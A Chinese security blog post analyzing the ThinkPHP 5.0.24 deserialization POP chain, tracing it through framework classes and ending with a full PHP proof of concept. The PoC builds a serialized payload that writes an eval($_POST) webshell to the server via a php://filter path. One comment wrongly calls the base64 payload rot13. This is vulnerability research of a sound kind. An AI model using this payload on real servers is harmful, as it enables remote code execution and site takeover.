<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><meta name="keywords" content="[object Object]"><meta name="description" content="[toc]
关于本文这篇是对thinkphp5.0.24反序列化漏洞的复现，因为代码量有点大，分析起来属实让人自闭，看的我头疼。本文分析会附带poc。"><meta name="author" content="Katharsis"><title>thinkphp5.0.24反序列化pop链分析 - Kath4rs1s</title><meta description="[toc] 关于本文这篇是对thinkphp5.0.24反序列化漏洞的复现，因为代码量有点大，分析起来属实让人自闭，看的我头疼。本文分析会附带poc。"><meta property="og:type" content="article"><meta property="og:title" content="thinkphp5.0.24反序列化pop链分析"><meta property="og:url" content="http://yoursite.com/2020/09/13/thinkphp5-rce/"><meta property="og:site_name" content="Katharsis"><meta property="og:description" content="[toc] 关于本文这篇是对thinkphp5.0.24反序列化漏洞的复现，因为代码量有点大，分析起来属实让人自闭，看的我头疼。本文分析会附带poc。"><meta property="og:locale" content="en_US"><meta property="article:published_time" content="2020-09-13T08:01:55.233Z"><meta property="article:modified_time" content="2020-09-16T05:02:34.045Z"><meta property="article:author" content="Katharsis"><meta property="article:tag" content="反序列化"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="http://yoursite.com/img/avatar.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://yoursite.com/2020/09/13/thinkphp5-rce/"},"headline":"thinkphp5.0.24反序列化pop链分析","image":["http://yoursite.com/img/avatar.png"],"datePublished":"2020-09-13T08:01:55.233Z","dateModified":"2020-09-16T05:02:34.045Z","author":{"@type":"Person","name":"Katharsis"},"description":"[toc] 关于本文这篇是对thinkphp5.0.24反序列化漏洞的复现，因为代码量有点大，分析起来属实让人自闭，看的我头疼。本文分析会附带poc。"}</script><link rel="alternative" href="/atom.xml" title="Kath4rs1s" type="application/atom+xml"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-dark.min.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><link rel="stylesheet" href="/css/style.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2020-09-13  <span class="level-item"><i class="far fa-clock"> </i>8 m  <i class="fas fa-pencil-alt"> </i>1.2 k</span><span class="level-item" id="busuanzi_container_page_pv"><i class="far fa-eye"></i>&nbsp;&nbsp;<span id="busuanzi_value_page_pv">0</span> visits</span></div></div><h1 class="title is-3 is-size-4-mobile">thinkphp5.0.24反序列化pop链分析</h1><div class="content"><p>[toc]</p>
<h2 id="关于本文"><a href="#关于本文" class="headerlink" title="关于本文"></a>关于本文</h2><p>这篇是对thinkphp5.0.24反序列化漏洞的复现，因为代码量有点大，分析起来属实让人自闭，看的我头疼。<br>本文分析会附带poc。</p>
<a id="more"></a>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>从网上下载下来此版本的代码，然后打开 <strong>application\index\controller\index.php</strong>，写下如下代码。</p>
<p><img src="/images/thinkphp5.0.24/20200913175057.png" alt=""></p>
<p>phpstorm+xdebug配置，下载一个chrome插件：<strong>xdebug helper</strong>，跟着网上教程设置一下，然后phpstorm监听，就可以断点单步跟踪调试了。<br>然后还开了框架的debug模式。</p>
<p><img src="/images/thinkphp5.0.24/20200913180513.png" alt=""></p>
<h2 id="反序列化分析"><a href="#反序列化分析" class="headerlink" title="反序列化分析"></a>反序列化分析</h2><p>全局搜索一下<strong>__destruct()</strong>方法，在<strong>Windows</strong>类中发现一个可以利用的。</p>
<p><img src="/images/thinkphp5.0.24/20200913180841.png" alt=""></p>
<p>跟进removeFiles()方法</p>
<p><img src="/images/thinkphp5.0.24/20200913181028.png" alt=""></p>
<p>这里的<strong>file_exists()</strong>函数会触发<strong>__toString()</strong>方法，全局搜索__tostring()，在<strong>Model</strong>类中发现可以利用的，因为Model是抽象类，不能被实例化为对象，必须找到他的子类<strong>Pivot</strong>，父类中的方法子类是可以继承的嘛，一会用<strong>Pivot</strong>就好了。</p>
<p><img src="/images/thinkphp5.0.24/20200913181459.png" alt=""><br><img src="/images/thinkphp5.0.24/20200913181556.png" alt=""></p>
<p><strong>__toStrint()</strong> =&gt; <strong>toJson()</strong> =&gt; <strong>toArray()</strong></p>
<p>跟进toArray()方法，这个方法前半部分是没有用的，不用管他，直接看后半部分</p>
<p><img src="/images/thinkphp5.0.24/20200913182049.png" alt=""></p>
<p>看这一行代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$item[$key] &#x3D; $value ? $value-&gt;getAttr($attr) : null;</span><br></pre></td></tr></table></figure>
<p>这里的 <strong>value</strong> 和 <strong>attr</strong> 都是可控的，这不是正好可以触发<strong>__call</strong>方法吗，于是向前看看这两个变量是怎么来的。<br>首先 <strong>this-&gt;append</strong>不为空且为数组，数组里面的值不能为数组，并且不能包含点号。这个 <code>loader::parseName()</code> 就是转换大小写的函数，不用管。然后往下第902行，如果 <code>$this-&gt;$relation()</code> 存在并且把其返回值赋值给 <strong>$modeRelation</strong> 。<br>因为这里是 <code>$this-&gt;$relation()</code> 而不是 <code>$this-&gt;relation()</code> ，我们便可以通过 <strong>$relation</strong>参数调用这个类中的任意方法<br>往下找了找找到了这个方法，可以返回任意值。</p>
<p><img src="/images/thinkphp5.0.24/20200913184226.png" alt=""></p>
<p>然后下面这行代码，调用了 <strong>$modeRelation</strong> 作为参数，并且把返回值传给 <strong>$value</strong> ，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$value         &#x3D; $this-&gt;getRelationData($modelRelation);</span><br></pre></td></tr></table></figure>
<p>跟进一下</p>
<p><img src="/images/thinkphp5.0.24/20200913184844.png" alt=""></p>
<p>这里又一个if/else分支，按道理来说if为真时完全可以达成一条完整的pop链，把 <strong>$this-&gt;parent</strong> 的值赋值给value，然后再往下触发<strong>__call</strong> 即可，但不知道为什么复现时候老是报错，没办法执行，真难，艹。</p>
<p>然后又找到了另一条链子，这里就不看没成功的那个了，回头有时间再看看。<br>看646行，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$value &#x3D; $modelRelation-&gt;getRelation();</span><br></pre></td></tr></table></figure>
<p>调用了 <strong>getRelation</strong> 方法，我们要找一个有这个方法并且返回值可控的，于是在 <strong>HasOne</strong> 这个类中找到了这个方法，看一下</p>
<p><img src="/images/thinkphp5.0.24/20200913191222.png" alt=""></p>
<p>看第53、54行，这里两个参数都是可控的，在这里可以触发 <strong>__call()</strong> 。</p>
<p>可调用的 <strong>__call()</strong> 在 <strong>Output</strong> 类中：</p>
<p><img src="/images/thinkphp5.0.24/20200913192538.png" alt=""></p>
<p>跟进 <strong>Output</strong> 类 <strong>block</strong> 方法</p>
<p><img src="/images/thinkphp5.0.24/20200913192810.png" alt=""></p>
<p>跟进 <strong>writeIn</strong> 方法</p>
<p><img src="/images/thinkphp5.0.24/20200913192900.png" alt=""></p>
<p>跟进 <strong>write</strong> 方法</p>
<p><img src="/images/thinkphp5.0.24/20200913192950.png" alt=""></p>
<p>这里可以调用任意类的write方法，全局搜索一下write方法，在 <strong>Memcache</strong> 类中的 <strong>write</strong> 可以调用任意类的 <strong>set</strong>方法。</p>
<p><img src="/images/thinkphp5.0.24/20200913193105.png" alt=""></p>
<p>寻找 <strong>set</strong> 方法，在 <strong>File</strong> 类中，</p>
<p><img src="/images/thinkphp5.0.24/20200913193447.png" alt=""></p>
<p>需要使用伪协议绕过exit()使用file_put_contents()写入shell，<br>这里第一次调用 <strong>set</strong> 参数是不可控的，无法写shell，真正写shell是利用 <strong>setTagItem()</strong> 方法第二次调用set，然后就可以写入shell了。</p>
<p>中途写好后运行了几次无法在windows中复现成功，于是参考了这里：</p>
<blockquote>
<p><a href="https://xz.aliyun.com/t/7457#toc-3">https://xz.aliyun.com/t/7457#toc-3</a></p>
</blockquote>
<p>下面是最后的POC：</p>
<h2 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;File类</span><br><span class="line">namespace think\cache\driver;</span><br><span class="line">class File</span><br><span class="line">&#123;</span><br><span class="line">    protected $tag&#x3D;&#39;sodayo&#39;;</span><br><span class="line">    protected $options &#x3D; [</span><br><span class="line">        &#39;expire&#39;        &#x3D;&gt; 0,</span><br><span class="line">        &#39;cache_subdir&#39;  &#x3D;&gt; false,</span><br><span class="line">        &#39;prefix&#39;        &#x3D;&gt; false,</span><br><span class="line">        &#39;path&#39;          &#x3D;&gt; &#39;php:&#x2F;&#x2F;filter&#x2F;convert.iconv.utf-8.utf-7|convert.base64-decode&#x2F;resource&#x3D;aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g&#x2F;..&#x2F;a.php&#39;, &#x2F;&#x2F;这里是欲写入的PHP被rot13后的结果</span><br><span class="line">        &#39;data_compress&#39; &#x3D;&gt; false,</span><br><span class="line">    ];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;Memcached类</span><br><span class="line">namespace think\session\driver;</span><br><span class="line">use think\cache\driver\File;</span><br><span class="line">class Memcached</span><br><span class="line">&#123;</span><br><span class="line">    protected $handler;</span><br><span class="line">    function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;handler&#x3D;new File();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;Output类</span><br><span class="line">namespace think\console;</span><br><span class="line">use think\session\driver\Memcached;</span><br><span class="line">class Output</span><br><span class="line">&#123;</span><br><span class="line">    protected $styles &#x3D; [&#39;removeWhereField&#39;];</span><br><span class="line">    function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;handle&#x3D;new Memcached();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">&#x2F;&#x2F;HasOne类</span><br><span class="line">namespace think\model\relation;</span><br><span class="line">use think\console\Output;</span><br><span class="line">class HasOne</span><br><span class="line">&#123;</span><br><span class="line">    &#x2F;&#x2F;protected $foreignKey&#x3D;&quot;sss&quot;; &#x2F;&#x2F;$this-&gt;query-&gt;removeWhereField($this-&gt;foreignKey)</span><br><span class="line">    function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;query&#x3D;new Output();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;Pivot类</span><br><span class="line">namespace think\model;</span><br><span class="line">use think\model\relation\HasOne;</span><br><span class="line">class Pivot</span><br><span class="line">&#123;</span><br><span class="line">    protected $append &#x3D; [&#39;getError&#39;];</span><br><span class="line">    public function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;error&#x3D;new HasOne();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">&#x2F;&#x2F;Windows类</span><br><span class="line">namespace think\process\pipes;</span><br><span class="line">use think\model\Pivot;</span><br><span class="line">class Windows</span><br><span class="line">&#123;</span><br><span class="line">    public function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;files&#x3D;[new Pivot()];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$x&#x3D;new Windows();</span><br><span class="line"></span><br><span class="line">echo urlencode(serialize($x));</span><br></pre></td></tr></table></figure>
<p>运行后生成a.php6218150bbcad1e6eec78da4604c4b6c7.php，其中包含了一个eval($_POST[‘ccc’])</p>
<p><img src="/images/thinkphp5.0.24/20200913204939.png" alt=""></p>
<h2 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h2><p>只想说是真的难，和平时比赛中的反序列化链子完全不是一个级别的。然后总之就是多审链子，还是太菜了。</p>
</div><ul class="post-copyright"><li><strong>Post Title: </strong><a href="http://yoursite.com/2020/09/13/thinkphp5-rce/">thinkphp5.0.24反序列化pop链分析</a></li><li><strong>Post Author: </strong><a href="http://yoursite.com">Katharsis</a></li><li><strong>Post Link: </strong><a href="http://yoursite.com/2020/09/13/thinkphp5-rce/">http://yoursite.com/2020/09/13/thinkphp5-rce/</a></li><li><strong>Copyright Notice: </strong><span>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.</span></li></ul><div><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># Related Post</span><br><span>  1.<a class="is-size-6" href="/2020/09/25/thinkphp6/" target="_blank">thinkphp6反序列化链</a><br></span><span>  2.<a class="is-size-6" href="/2020/09/16/thinkphp-5-1-39/" target="_blank">thinkphp_5.1.39反序列化分析</a><br></span><span>  3.<a class="is-size-6" href="/2020/09/10/ciscn-laravel1/" target="_blank">ciscn2019 laravel反序列化利用链</a><br></span><span>  4.<a class="is-size-6" href="/2020/08/18/PHP-Audit-Labs/" target="_blank">代码审计之——PHP-Audit-Labs</a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2020/09/16/thinkphp-5-1-39/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">thinkphp_5.1.39反序列化分析</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2020/09/10/ciscn-laravel1/"><span class="level-item">ciscn2019 laravel反序列化利用链</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1 is-sticky"><div class="card widget toc-scroll" id="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-关于本文" href="#关于本文"><span>关于本文</span></a></li><li><a class="is-flex toc-item" id="toc-item-环境搭建" href="#环境搭建"><span>环境搭建</span></a></li><li><a class="is-flex toc-item" id="toc-item-反序列化分析" href="#反序列化分析"><span>反序列化分析</span></a></li><li><a class="is-flex toc-item" id="toc-item-POC" href="#POC"><span>POC</span></a></li><li><a class="is-flex toc-item" id="toc-item-最后" href="#最后"><span>最后</span></a></li></ul></div></div><script type="text/javascript" async>
        $(document).ready(function () { //参考自 https://github.com/ppoffice/hexo-theme-icarus/pull/616/files
            var observerTopMargin;
            var scrollObserver;
            var headerElems = $(".headerlink");
            var activeTocItem;
        
            function initIntersectionObserver(docHeight) {
                observerTopMargin = docHeight;
                scrollObserver = new IntersectionObserver(scrollCallBack,
                    {
                        root: null,  // viewpoint
                        rootMargin: docHeight + "px 0px -80% 0px"  // cover top 30% of viewport to the top of document
                    })
            }
        
            function scrollCallBack(entries, observer) {
                if ($(window).scrollTop() > observerTopMargin * 0.7) { 
                    // User somehow scroll to 70% of observerTopMargin (which is inited as 200% document height)
                    // Observer top margin need to extend to cover all the space to the top of the document
                    initIntersectionObserver(observerTopMargin * 2)
                    observer.disconnect();
                    return;
                }
                let toActive;
                if (entries[0].intersectionRatio == 1) {  // enter viewed area
                    let entry = entries.reduce((u, v) => (u.target.toc_id > v.target.toc_id ? u : v));  // get the lowest item
                    toActive = $("#toc-item-" + $(entry.target).attr("href").substr(1));
                } else {
                    let entry = entries.reduce((u, v) => (u.target.toc_id < v.target.toc_id ? u : v));  // get the highest item
                    let idx = Math.max(entry.target.toc_id - 1, 0);
                    toActive = $("#toc-item-" + $(headerElems[idx]).attr("href").substr(1));
                }
                if (activeTocItem) activeTocItem.removeClass("is-current");
                activeTocItem = toActive
                activeTocItem.addClass("is-current");
            }
        
            initIntersectionObserver($(document).height() * 2);
            headerElems.each(function (index, obj) {
                obj.toc_id = index;
                scrollObserver.observe(obj);
            })
        });</script></div><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="" src="/img/avatar.png" alt="Katharsis"></figure><p class="title is-size-4 is-block line-height-inherit">Katharsis</p><p class="is-size-6 is-block">^_^</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>中国</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">20</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">5</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">4</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="/" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Github" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Weibo" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Email" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Next" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="RSS" href="/null"><i></i></a></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a><p class="size-small"><span>&copy; 2020 Katharsis</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>,Modify by <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">removeif</a> <br><span>© 版权说明：[本网站所有内容均收集于互联网或自己创作,<br />&nbsp;&nbsp;&nbsp;&nbsp;方便于网友与自己学习交流，如有侵权，请<a href="/message" target="_blank">留言</a>，立即处理]<br /></span><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️Site from <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> has existed <strong>" + dnum + "</strong> d <strong>" + hnum + "</strong> h <strong>" + mnum + "</strong> m <strong>" + snum + "</strong> s！❤️";
        }var now = new Date();setInterval("createTime('2020/7/11 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️Thx <strong><span id="busuanzi_value_site_uv">99+</span></strong> users <strong><span id="busuanzi_value_site_pv">99+</span></strong> visited！❤️</span></div></p></div><div class="level-end"><div class="sideMusic"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="/js/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script><meting-js style="width: auto;height: 2000px;" server="netease" type="playlist" id="4978492128" theme="#2980b9" loop="all" autoplay="false" order="list" storageName="aplayer-setting" lrctype="0" list-max-height="400px" fixed="true"></meting-js></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'http://yoursite.com',
                external_link: {"enable":true,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to Top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back-to-top.js" defer></script><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/js/lightgallery-all.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><!--!--><!--!--><!--!--><script src="/js/toc.js" defer></script><script src="/js/main.js" defer></script><link rel="stylesheet" href="/css/insight.css"><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Type something..."><span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"></div></div></div></div><script>(function (window) {
            var INSIGHT_CONFIG = {
                TRANSLATION: {
                    POSTS: 'Posts',
                    PAGES: 'Pages',
                    CATEGORIES: 'Categories',
                    TAGS: 'Tags',
                    UNTITLED: '(Untitled)',
                },
                CONTENT_URL: '/content.json',
            };
            window.INSIGHT_CONFIG = INSIGHT_CONFIG;
        })(window);</script><script src="/js/insight.js" defer></script></body></html>